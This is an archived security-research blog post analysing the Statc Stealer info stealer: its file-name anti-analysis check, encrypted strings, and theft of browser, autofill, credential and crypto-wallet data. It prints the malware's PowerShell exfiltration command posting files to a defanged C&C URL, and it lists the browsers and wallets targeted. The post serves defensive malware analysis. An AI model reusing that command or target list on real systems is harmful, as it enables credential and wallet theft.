Statc Stealer | ThreatLabz
By Shivam Sharma, Amandeep Kumar
Published: 2023-08-08 · Archived: 2026-04-05 21:50:14 UTC
Technical Analysis
Evasion using anti-analysis techniques
Typically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the
victim’s machine.
We found one anti-analysis technique while analyzing Statc Stealer:
The sample looks for its original file name
Checks whether its file name is the same as its internal name 
Stops executing if it finds differences
Essentially, if Statc Stealer discovers that you’ve changed or updated its malicious files, then it stops in its tracks. 
The code example in the image below shows how:
The sample used a FileName check
The sample compares the file name with a hardcoded encrypted string  
Figure 3:  File name comparison code
Theft and exfiltration of data
Stealing activity
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 1 of 9

Statc Stealer has a general information stealing capability. It’s able to take sensitive information from various
browsers and wallets, and then store the data in a text file inside a Temp folder.
Using the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.
The image below shows various references to “wallets'' and “crypto”, indicating that sensitive cryptocurrency
information has been compromised.
Figure 4:  Decrypted strings using python script
Encrypted strings
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 2 of 9

https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 3 of 9

Figure 5:  Encrypted strings 
Decrypted strings
Figure 6:  Decrypted strings
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 4 of 9

Browser exfiltration
Browser exfiltration is the unauthorized transfer of any data from a browser. It can involve social engineering,
phishing attacks and emails, and even uploading data to an insecure hard drive. 
However, Statc Stealer uses its malicious software to drop and execute malicious files. Let’s explore how this
works.
How it works
Statc Stealer employs a straightforward and easily detectable technique to steal browser data. It leverages the
Invoke-WebRequest Uniform Resource Identifier (URI) in PowerShell to initiate a process, using the following
arguments:
Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\Users\
The significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and
send it securely to its C&C server. This allows the malware to harvest valuable information, such as login
credentials and personal details, for malicious purposes like identity theft and financial fraud. Despite its
simplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the
development of effective countermeasures. 
Targeted browsers
The Statc Stealer malware can exfiltrate data from the following browsers:
Chrome
Microsoft Edge
Brave
Opera
Yandex
Mozilla Firefox
It comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows
browsers, By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise
sensitive data from a larger pool of unsuspecting users.
Stealing autofill data
Statc Stealer is also capable of exfiltrating autofill data. If a stealer takes autofill data, login credentials, Personally
Identifiable Information (PII) and payment information is at risk:
Usernames and passwords
Email
Credit card details
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 5 of 9

Personal addresses
Payment information
Stolen data 
Figure 7: Stolen data in decrypted form
Data in encrypted form
Figure 8: Stolen data after encryption
In the images above, the Statc Stealer is exfiltrating browsers’ autofill information. From here, the malware will
encrypt the stolen data and store it in a text file in the Temp folder.
Process Monitor (ProcMon)
Process Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system,
Registry and process/thread activity. It can help provide a snapshot into the types of sensitive information Statc
Stealer is capable of stealing.
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 6 of 9

Using ProcMon, we observed that Statc Stealer steals:
user’s cookies data
web data
local state 
data preferences 
login data
various different wallets information
FileZilla
browsers autofills
anydesk 
ronin_edge
meta mask 
Telegram data
We captured this malicious activity in ProcMon in the image below.
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 7 of 9

Figure 9: Browser related data shown in ProcMon
Wallet data
The Statc Stealer can exfiltrate data from various wallets, like:
Cryptocom-Wallet
Petra-aptos-wallet
exodus-web3-wallet
bitkeep-crypto-nft-wallet
liquality-wallet
ethos-sui-wallet
suite-sui-wallet
tallsman-polkadot-wallet
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 8 of 9

Enkrypt-ethereum-polkadot
leap-cosmos-wallet
pontem-aptos-wallet
fewcha-move-wallet
rise-aptos-wallet
teleport-wallet
martin-wallet-aptos-sui
avana-wallet-solana-wallet
glow-solana-wallet-beta
solflare-wallet
Source: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
Page 9 of 9